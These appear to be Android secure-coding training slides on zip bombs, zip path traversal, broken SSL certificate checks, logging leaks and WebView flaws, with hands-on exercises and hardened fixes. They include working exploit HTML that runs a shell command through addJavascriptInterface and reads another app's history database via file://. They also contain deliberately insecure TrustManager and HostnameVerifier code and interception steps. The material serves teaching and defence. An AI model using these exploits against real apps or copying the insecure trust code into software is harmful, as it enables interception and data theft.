Decompression bomb vulnerabilities AERAsec Network Services and Security GmbH http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html
Zip Bomb (http://en.wikipedia.org/wiki/Zip_bomb)
42.zip (http://www.unforgettable.dk/)
Check and learn about decompression bombs!
Directory Traversal
Zip entries (file names) are untrusted input
— Filenames in a zip file could contain special characters (such as ‘.’, ‘/’, ‘¥’ etc.) to conduct path traversal attacks
Example entry listing:
document.docx
presentation.pptx
../../../sdcard/malware
picture1.jpg
picture2.jpg
Filenames in a zip file should be checked before the files are created in the filesystem.
Vulnerable Code Example
class Unzip {
    static final int BUFFER = 512;

    public static void main(String[] args) throws FileNotFoundException, IOException {
        BufferedOutputStream dest = null;
        ZipInputStream zis = new ZipInputStream(
                new BufferedInputStream(new FileInputStream(args[0])));
        ZipEntry entry;
        while ((entry = zis.getNextEntry()) != null) {
            System.out.println("Extracting: " + entry);
            int count;
            byte data[] = new byte[BUFFER];
            FileOutputStream fos = new FileOutputStream(entry.getName());
            dest = new BufferedOutputStream(fos, BUFFER);
            while ((count = zis.read(data, 0, BUFFER)) != -1) {
                dest.write(data, 0, count);
            }
            dest.flush();
            dest.close();
        }
        zis.close();
    }
}
Extracts contents without verifying the resulting size
Uses entry filenames in ZIP archive without verification
Solution: Verify filenames and resulting sizes BEFORE extracting files
Solution
Canonicalize the given path first. Then make sure that the given path is in the intendedDir
static final int BUFFER = 512;
static final int TOOBIG = 0x6400000;  // upper limit of file size, 100MB
static final int TOOMANY = 1024;      // upper limit of entries
// ...
private String validateFilename(String filename, String intendedDir)
        throws IOException {
    // resolve the entry name relative to the target directory, not the working directory
    File f = new File(intendedDir, filename);
    String canonicalPath = f.getCanonicalPath();
    File iD = new File(intendedDir);
    String canonicalID = iD.getCanonicalPath();
    // the trailing separator keeps a sibling such as "intendedDir2/..." from passing
    if (canonicalPath.startsWith(canonicalID + File.separator)) {
        return canonicalPath;
    } else {
        throw new IllegalStateException("File is outside extraction target directory.");
    }
}

public final void unzip(String filename) throws java.io.IOException {
Continues on the next page…
Solution (cont.)
public final void unzip(String filename) throws java.io.IOException {
    FileInputStream fis = new FileInputStream(filename);
    ZipInputStream zis = new ZipInputStream(new BufferedInputStream(fis));
    ZipEntry entry;
    int entries = 0;
    int total = 0;
    try {
        while ((entry = zis.getNextEntry()) != null) {
            System.out.println("Extracting: " + entry);
            int count;
            byte data[] = new byte[BUFFER];
            // output a file only AFTER verifying its name and the accumulated size
            String name = validateFilename(entry.getName(), ".");
            FileOutputStream fos = new FileOutputStream(name);
            BufferedOutputStream dest = new BufferedOutputStream(fos, BUFFER);
            while (total <= TOOBIG && (count = zis.read(data, 0, BUFFER)) != -1) {
                dest.write(data, 0, count);
                total += count;
            }
            dest.flush();
            dest.close();
            zis.closeEntry();
            entries++;
            if (entries > TOOMANY) {
                throw new IllegalStateException("Too many files to unzip.");
            }
            if (total > TOOBIG) {
                throw new IllegalStateException("File being unzipped is too big.");
            }
        }
    } finally {
        zis.close();
    }
}
Bookkeeping of the extracted size, so that it won’t exceed the upper limit
Improper Certificate Verification
CASE #16
ACM CCS 2012 Why Eve and Mallory Love Android: An Analysis of Android SSL (In)Security
http://www2.dcsec.uni-hannover.de/files/android/p50-fahl.pdf
The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software
https://crypto.stanford.edu/~dabo/pubs/abstracts/ssl-client-bugs.html
Many apps misuse SSL/TLS libraries!!
- Do not verify certificates
- Do not verify the hostname part, etc.
25% of Apps vulnerable to HTTPS handling
¼ of android applications contain HTTPS related vulnerabilities
Android Application Vulnerability Research Report, Oct., 2013 http://www.sonydna.com/sdna/solution/android_vulnerability_report_201310.pdf
Root Cause of HTTPS Vulnerabilities
Android Application Vulnerability Research Report, Oct., 2013 http://www.sonydna.com/sdna/solution/android_vulnerability_report_201310.pdf
[Fig. 8: Causes of HTTPS-related vulnerabilities: customized X509TrustManager, customized WebViewClient#onReceivedSslError, customized HostnameVerifier]
Vulnerabilities published on JVN
 - Kindle App for Android fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN17637243/)
 - Ameba for Android contains an issue where it fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN27702217/)
 - Outlook.com for Android contains an issue where it fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN72950786/)
 - JR East Japan App for Android contains an issue where it fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN10603428/)
 - Denny's App for Android contains an issue where it fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN48810179/)
 - Yahoo! Japan Shopping for Android contains an issue where it fails to verify SSL server certificates (https://jvn.jp/en/jp/JVN75084836/)
 - ...
Pizza Order App fails to verify SSL Server Certificates
https://jvn.jp/en/jp/JVN39218538/index.html
https://play.google.com/store/apps/details?id=jp.pizzahut.aorder
You can order pizza delivery
The transaction contains users' personal information
The vulnerability allows MITM attack!!
Attack Scenario (user's Pizza order app, attacker impersonating the server)
 1. App requests SSL/TLS connection
 2. Attacker, impersonating the server, responds with a malicious certificate
 3. App proceeds the session WITHOUT verifying the certificate
Vulnerable Code (jp/pizzahut/aorder/data/DataUtil.java)

    public static HttpClient getNewHttpClient() {
      DefaultHttpClient v6;
      try {
        KeyStore v5 = KeyStore.getInstance(KeyStore.getDefaultType());
        v5.load(null, null);
        MySSLSocketFactory mySSLScoket = new MySSLSocketFactory(v5);
        if(PizzaHutDefineRelease.sAllowAllSSL) {
          ((SSLSocketFactory)mySSLScoket).setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
        }
        BasicHttpParams v2 = new BasicHttpParams();
        HttpConnectionParams.setConnectionTimeout(((HttpParams)v2), 30000);
        ...
      } catch(Exception v1) {
        v6 = new DefaultHttpClient();
      }
      return ((HttpClient)v6);
    }
Other Vulnerable Code Pattern

empty TrustManager:

    TrustManager tm = new X509TrustManager() {
      @Override
      public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        // do nothing, hence accepts any certificates
      }
      @Override
      public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        // do nothing, hence accepts any certificates
      }
      @Override
      public X509Certificate[] getAcceptedIssuers() {
        return null;
      }
    };

empty HostnameVerifier:

    HostnameVerifier hv = new HostnameVerifier() {
      @Override
      public boolean verify(String hostname, SSLSession session) {
        // always returns true, hence accepts any hostnames
        return true;
      }
    };
Mitigation
 - Verify SSL/TLS certificates properly
 - Additional mitigation: communicate with certain servers only
   —SSL Pinning
   —http://nelenkov.blogspot.com/2012/12/certificate-pinning-in-android-42.html
 - See "Android Application Secure Design / Secure Coding guidebook", section 5.4, Communicating via HTTPS
   —SSLException must be handled properly
   —TrustManager must not be customized
   —HostnameVerifier must not be customized
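The "additional mitigation" above, pinning the server's public key on top of the platform's default verification, as an added example. This is not code from the guidebook or from any of the apps listed; it assumes plain Java SE 8 APIs (java.util.Base64; on Android, android.util.Base64 can be substituted), and the class name PinnedHttps, the pin set and the hypothetical server key pairs in main() are assumed for illustration. connect() needs a network; main() exercises only the pin check offline, with freshly generated key pairs standing in for server keys (constructed input).

```java
import java.io.IOException;
import java.net.URL;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.PublicKey;
import java.security.cert.Certificate;
import java.util.Base64;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLPeerUnverifiedException;

/**
 * Public-key (SPKI) pinning layered on top of the platform's default
 * certificate verification. No custom TrustManager or HostnameVerifier is
 * installed: the defaults validate the chain and the hostname, and pinning
 * only adds a second check after the handshake has succeeded.
 */
public final class PinnedHttps {

    /** Expected pins: base64(SHA-256(DER-encoded SubjectPublicKeyInfo)). */
    private final Set<String> pins;

    public PinnedHttps(Set<String> pins) {
        this.pins = Collections.unmodifiableSet(new HashSet<>(pins));
    }

    /** Computes the SPKI pin of a public key. */
    public static String pinOf(PublicKey key) {
        try {
            MessageDigest sha256 = MessageDigest.getInstance("SHA-256");
            return Base64.getEncoder().encodeToString(sha256.digest(key.getEncoded()));
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 not available", e);
        }
    }

    public boolean keyMatchesPin(PublicKey key) {
        return pins.contains(pinOf(key));
    }

    /**
     * True if any certificate in the already-validated chain carries a pinned
     * key. Accepting a pin anywhere in the chain (leaf, intermediate or root)
     * lets the server operator rotate the leaf certificate without breaking the app.
     */
    public boolean chainMatchesPin(Certificate[] chain) {
        if (chain == null) {
            return false;
        }
        for (Certificate cert : chain) {
            if (keyMatchesPin(cert.getPublicKey())) {
                return true;
            }
        }
        return false;
    }

    /**
     * Opens an HTTPS connection with platform defaults and aborts it unless
     * the negotiated certificate chain matches one of the pins.
     */
    public HttpsURLConnection connect(URL url) throws IOException {
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        // Deliberately no setSSLSocketFactory / setHostnameVerifier calls here.
        conn.connect();   // default TrustManager and HostnameVerifier run during the handshake
        try {
            if (!chainMatchesPin(conn.getServerCertificates())) {
                throw new SSLPeerUnverifiedException("server key does not match any pin");
            }
        } catch (IOException e) {
            conn.disconnect();
            throw e;
        }
        return conn;
    }

    /** Offline demonstration: generated key pairs stand in for server keys (constructed). */
    public static void main(String[] args) throws Exception {
        KeyPairGenerator gen = KeyPairGenerator.getInstance("RSA");
        gen.initialize(2048);
        KeyPair pinnedServer = gen.generateKeyPair();   // constructed: the key we pin
        KeyPair impostor = gen.generateKeyPair();       // constructed: a key an interceptor would present

        PinnedHttps pinned = new PinnedHttps(Collections.singleton(pinOf(pinnedServer.getPublic())));
        System.out.println("pin               : " + pinOf(pinnedServer.getPublic()));
        System.out.println("pinned server key : " + pinned.keyMatchesPin(pinnedServer.getPublic()));
        System.out.println("impostor key      : " + pinned.keyMatchesPin(impostor.getPublic()));
    }
}
```

Pins are computed over the SubjectPublicKeyInfo of certificates the app owner controls, and a backup pin for the next key should ship with the app so a rotation does not lock users out. Because the default TrustManager still runs before the pin check, an invalid or expired chain is rejected even when its key matches a pin; pinning narrows the set of accepted servers, it never widens it.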
5.4.1.2 Communicating via HTTPS
Refer to JSSEC Secure Coding Guidebook
5.4.2 Rule Book
Don't customize TrustManager and HostnameVerifier
Fake ID vulnerability
https://bluebox.com/technical/android-fake-id-vulnerability/
"Android Fake ID Vulnerability Lets Malware Impersonate Trusted Applications, Puts All Android Users Since January 2010 At Risk"
Presented at BlackHat 2014 USA: ANDROID FAKEID VULNERABILITY WALKTHROUGH
https://www.blackhat.com/us-14/archives.html#android-fakeid-vulnerability-walkthrough
Fake ID vulnerability
 - Android apps are digitally signed
 - Android OS verifies the signature when installing apps
 - The signature verifier code comes from the old Apache Harmony code
 - The signature verifier code had a problem: it couldn't verify certificate chaining properly.

MORAL: Certificate verification is a complicated process. If you need to develop your own verification code, you need a clear understanding, fine coding skills, and a sophisticated testing phase.
References
 - SSL Vulnerabilities: Who listens when Android applications talk?
   —http://www.fireeye.com/blog/technical/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
 - Why Eve and Mallory Love Android: An Analysis of Android SSL (In)Security
   —http://www2.dcsec.uni-hannover.de/files/android/p50-fahl.pdf
 - Defeating SSL Certificate Validation for Android Applications
   —https://secure.mcafee.com/us/resources/white-papers/wp-defeating-ssl-cert-validation.pdf
 - OnionKit by Android Library Project for Multi-Layer Network Connections (Better TLS/SSL and Tor)
   —https://github.com/guardianproject/OnionKit
 - Android Pinning by Moxie Marlinspike
   —https://github.com/moxie0/AndroidPinning
Part 3. Exercise: Vulnerability
Using tools
 - mitmproxy or Fiddler —proxy tool
 - apktool —reverse engineering tool
 - dex2jar —convert dex to jar file
 - JD-GUI —decompiler for Java
Install mitmproxy
 - mitmproxy —http://mitmproxy.org/
 - Installation in Windows
   —Install Python —https://www.python.org/
   —pip install mitmproxy
Install Fiddler
 - Fiddler —http://www.telerik.com/fiddler
 - Configure Fiddler to capture traffic from Android apps
   —Click [Tools] > [Fiddler Options]
   —Click [HTTPS] > [Decrypt HTTPS traffic]
   —Click [Connections] > [Allow remote computers to connect]
apktool
 - apktool —https://code.google.com/p/android-apktool/
   —for reverse engineering apk files
 - Features
   —decode resources, rebuild, etc.
dex2jar
 - dex2jar —https://code.google.com/p/dex2jar/
   —convert Android dex file to Java class file
JD-GUI
 - JD-GUI —http://jd.benow.ca/
   —Decompiler for Java
SSL Vulnerability
SSL Vulnerability
Many apps contain SSL vulnerabilities.
 —The FireEye Mobile Security Team analyzed the 1,000 most downloaded free apps in Google Play. They found SSL vulnerabilities in about 68% of the apps.
http://www.fireeye.com/blog/technical/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Install vulnerable app
 - Vulnerable app —Monaca Debugger for Android ver1.4.1
   Monaca Debugger for Android contains an issue where it fails to verify SSL server certificates.
 - Installation
    adb install mobi.monaca.debugger-1.4.1.apk
Exercise: SSL Vulnerability
 - PC —Run mitmproxy or Fiddler on the PC
   —mitmproxy —Default port: 8080
   —Fiddler —Default port: 8888
 - Android —[Settings] > [Wi-Fi] > [target AP]
   —Tap [Show advanced options]
   —Change proxy settings: [Proxy hostname], [Proxy port]
   —Launch Monaca Debugger
   —Type "hoge@example.com" in the Email Address and "abcdefg" in the Password, tap Login.
Using mitmproxy
Using Fiddler
Analysis
 - Decode resources
    java -jar apktool.jar d mobi.monaca.debugger-1.4.1.apk out
   —Decoded files are output to the "out" directory.
 - Convert the dex file to a jar file
    dex2jar.sh mobi.monaca.debugger-1.4.1.apk
   —Launch JD-GUI
   —Open the jar file: mobi.monaca.debugger-1.4.1_dex2jar.jar
Exercise: Find vulnerable code
Find vulnerable code!
Spot the Flaw
Logging Vulnerability
Install vulnerable app
 - Vulnerable app —Monaca Debugger for Android ver1.4.1
   Monaca Debugger for Android contains an information management vulnerability.
 - Installation
    adb install mobi.monaca.debugger-1.4.1.apk
Exercise: Logging Vulnerability
 - Connect Android to the PC using USB
 - Android
   —Enable [Developer options] > [USB debugging]
   —On Android 4.2 and higher, the Developer options screen is hidden by default. Go to [Settings] > [About phone] and tap [Build number] seven times.
 - PC
    adb shell logcat
 - Launch Monaca Debugger
   —Type "hoge@example.com" in the Email Address and "abcdefg" in the Password, tap Login.
Exercise: Logging Vulnerability
Exercise: Find vulnerable code
Find vulnerable code!
Spot the Flaw
WebView Vulnerability
WebView Vulnerability
 - JavaScript is turned on
   —WebView#addJavascriptInterface
 - Same origin policy
   —XMLHttpRequest, file scheme
WebView#addJavascriptInterface
WebView#addJavascriptInterface(Object object, String name)
 —allows the Java object's methods to be accessed from JavaScript

    @Override
    public void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(R.layout.demo);
      context = this.getApplicationContext();
      webView = (WebView) findViewById(R.id.demoWebView);
      webView.getSettings().setJavaScriptEnabled(true);
      webView.addJavascriptInterface(new JSObject(this), "jsobject");
    }

    public class JSObject {
      Context mContext;
      public JSObject(Context context) {
        mContext = context;
      }
    }
Install vulnerable app
 - Vulnerable app —Sleipnir Mobile for Android 2.0.4
   Sleipnir Mobile for Android contains an arbitrary Java method execution vulnerability.
 - Install the app
    adb install jp.co.fenrir.android.sleipnir-2.0.4.apk
 - Exploit code
    adb push addjavascriptinterface.html /mnt/sdcard/
Exercise: WebView Vulnerability
 - Launch Sleipnir Mobile
 - Open the exploit html file —file://mnt/sdcard/addjavascriptinterface.html
Exploit code: addjavascriptinterface.html

    <html>
    <body>
    <p>WebView Vulnerability: addJavascriptInterface</p>
    <script>
    var myclass = SleipnirMobile;
    var classLoader = myclass.getClass().getClassLoader();
    // using android.os.Build
    var buildClass = classLoader.loadClass('android.os.Build');
    document.write("<br />");
    document.write(buildClass.getField('SERIAL').get(null).toString());
    document.write("<br />");
    document.write(buildClass.getField('FINGERPRINT').get(null).toString());
    // using java.lang.Runtime
    var runtimeClass = classLoader.loadClass('java.lang.Runtime');
    var runtimeMethod = runtimeClass.getMethod('getRuntime', null);
    var get_runtime = runtimeMethod.invoke(null, null);
    document.write("<br />");
    document.write("create a text file on /mnt/sdcard/");
    document.write(get_runtime.exec(['sh', '-c', 'touch /mnt/sdcard/hoge.txt']));
    </script>
    </body>
    </html>
Exercise: Find vulnerable code
Find vulnerable code!
Spot the Flaw
File schema Vulnerability
 - Vulnerable app —Sleipnir Mobile for Android 2.0.4
   If a user of the affected product uses another malicious Android app, information managed by the affected product may be disclosed.
 - Exploit code
    adb push fileschema.html /mnt/sdcard/
Exercise: WebView Vulnerability
Type the following command:

    adb shell am start -n jp.co.fenrir.android.sleipnir/.main.IntentActivity file:///mnt/sdcard/fileschema.html
Exploit code: fileschema.html

    <html>
    <body>
    <p>WebView Vulnerability: File schema</p>
    <div id="result"> </div>
    <script>
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open('GET', 'file:///data/data/jp.co.fenrir.android.sleipnir/databases/history.db', false);
    xmlhttp.send(null);
    var ret = xmlhttp.responseText;
    document.getElementById('result').innerHTML = ret;
    </script>
    </body>
    </html>
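The two Sleipnir exercises above, the addJavascriptInterface one and the file schema one, share a single defensive counterpart: a WebView that exposes only annotated bridge methods and cannot read local files from a file:// page. The setup below is an added example, not code from the exercise app, the demo Activity or the JSSEC guidebook. It assumes Android API level 17 or higher with targetSdkVersion >= 17 (the level at which only @JavascriptInterface methods are reachable from JavaScript), and the class names HardenedWebViewActivity / SafeBridge, the bridge name "bridge" and the https://example.com/ start page are assumed for illustration. It compiles against the Android SDK and runs on a device, not on a desktop JVM.

```java
import android.annotation.SuppressLint;
import android.app.Activity;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

/** Hardened counterpart of the demo Activity: minimal JS bridge, no file:// access. */
public class HardenedWebViewActivity extends Activity {

    /** The only Java functionality the page may reach; nothing else is exposed. */
    public static final class SafeBridge {
        private final String appVersion;

        SafeBridge(String appVersion) {
            this.appVersion = appVersion;
        }

        // With targetSdkVersion >= 17 only methods carrying @JavascriptInterface are
        // callable from JavaScript, so getClass() and the ClassLoader walk used by
        // addjavascriptinterface.html are not reachable through this object.
        @JavascriptInterface
        public String getAppVersion() {
            return appVersion;
        }
    }

    @SuppressLint("SetJavaScriptEnabled")
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);   // assumption: the demo used findViewById instead
        setContentView(webView);

        WebSettings settings = webView.getSettings();
        // A page loaded from file:// must not be able to read other local files;
        // the XMLHttpRequest to history.db in fileschema.html depends on these being true.
        settings.setAllowFileAccess(false);
        settings.setAllowFileAccessFromFileURLs(false);
        settings.setAllowUniversalAccessFromFileURLs(false);
        settings.setAllowContentAccess(false);
        settings.setJavaScriptEnabled(true);   // only because the page needs the bridge

        // Below API 17 every public method of the bridge object is reflectively
        // reachable regardless of annotations, so install no bridge at all there.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.addJavascriptInterface(new SafeBridge("1.0"), "bridge");
        }

        // Navigation policy: https only. Returning true tells WebView to block the load.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !isAllowedUrl(url);
            }
        });

        // Load a fixed origin owned by the app. The Activity deliberately ignores any
        // URL carried by the launching Intent, which is how fileschema.html was opened.
        webView.loadUrl("https://example.com/");   // assumption: the app's own origin
    }

    /** Returns true only for https:// URLs; file://, content:// and javascript: are refused. */
    static boolean isAllowedUrl(String url) {
        if (url == null) {
            return false;
        }
        return "https".equalsIgnoreCase(Uri.parse(url).getScheme());
    }
}
```

shouldOverrideUrlLoading is not consulted for the initial loadUrl() or for XMLHttpRequest, so it is the file-access settings, not the navigation policy, that stop the history.db read; the policy only keeps link clicks and redirects on https. The Lint warning SetJavaScriptEnabled is suppressed on purpose because the bridge requires JavaScript; a WebView that needs no Java bridge should leave JavaScript disabled altogether.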
Part 4. Exercise: Code Assessment
Sample Application
 - RSS Viewer: retrieves RSS data and
   —parses it
   —stores it in DB
   —displays it using ListView / WebView
Eclipse Settings
 - Check the text encoding and build target
   —text encoding is "UTF-8"
   —build target: installed SDK version
Sample Application
Find as many vulnerabilities as you can!